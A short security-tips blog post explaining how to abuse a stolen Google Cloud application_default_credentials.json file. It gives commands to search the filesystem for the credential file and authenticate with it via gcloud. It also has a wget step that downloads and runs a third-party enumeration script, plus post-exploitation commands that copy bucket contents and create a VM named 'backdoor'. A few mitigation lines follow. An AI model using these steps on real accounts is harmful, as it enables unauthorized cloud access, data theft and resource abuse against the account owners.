Ethical Hacker Tip: Exploiting Google Cloud application_default_credentialsjson

By /

Listen to this Post

Finding a `application_default_credentials.json` file can grant unauthorized access to Google Cloud resources. This file contains a refresh token linked to a Google identity (user/service account), enabling attackers to:
– Generate OAuth2 access tokens
– Access GCP APIs (Cloud Storage, BigQuery, etc.)
– Escalate privileges via IAM roles
– Deploy costly resources (e.g., crypto mining)

You Should Know:

1. Locating the Credentials File

Default path:

~/.config/gcloud/application_default_credentials.json

Search recursively:

find / -name "application_default_credentials.json" 2>/dev/null

2. Exploiting with gCloud CLI

If you obtain the file:

export GOOGLE_APPLICATION_CREDENTIALS="/path/to/json"
gcloud auth list  Verify active account
gcloud projects list  Enumerate accessible projects

3. Python Enumeration Script

Download and run Mark’s script:

wget https://raw.githubusercontent.com/Hackertips-today/Google_enum/main/enum.py
python3 enum.py

Dependencies:

pip3 install google-auth google-auth-oauthlib google-auth-httplib2

4. Post-Exploitation Commands

  • List Cloud Storage Buckets: 
    gsutil ls
  • Download Bucket Contents: 
    gsutil cp -r gs://bucket-name /local/path
  • Spin Up a VM (Caution!): 
    gcloud compute instances create backdoor --machine-type=n1-standard-1 --image=ubuntu-2004-focal-v20240415

5. Mitigation (Defenders)

  • Revoke Compromised Tokens: 
    gcloud auth revoke --all
  • Audit IAM Roles: 
    gcloud projects get-iam-policy PROJECT_ID

What Undercode Say:

The `application_default_credentials.json` file is a goldmine for attackers. Always:
– Restrict token scope via `–scopes` flag during gcloud auth.
– Monitor GCP Activity Logs for anomalous API calls.
– Use short-lived tokens (gcloud auth print-access-token).

Expected Output:

Active account: [email protected]
Projects: 
- my-project-123 (PROJECT_ID)
Buckets:
- gs://sensitive-data-bucket

Reference:

Google Cloud IAM Best Practices
OAuth2 Token Exploitation

References:

Reported By: Activity 7315545728943091713 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: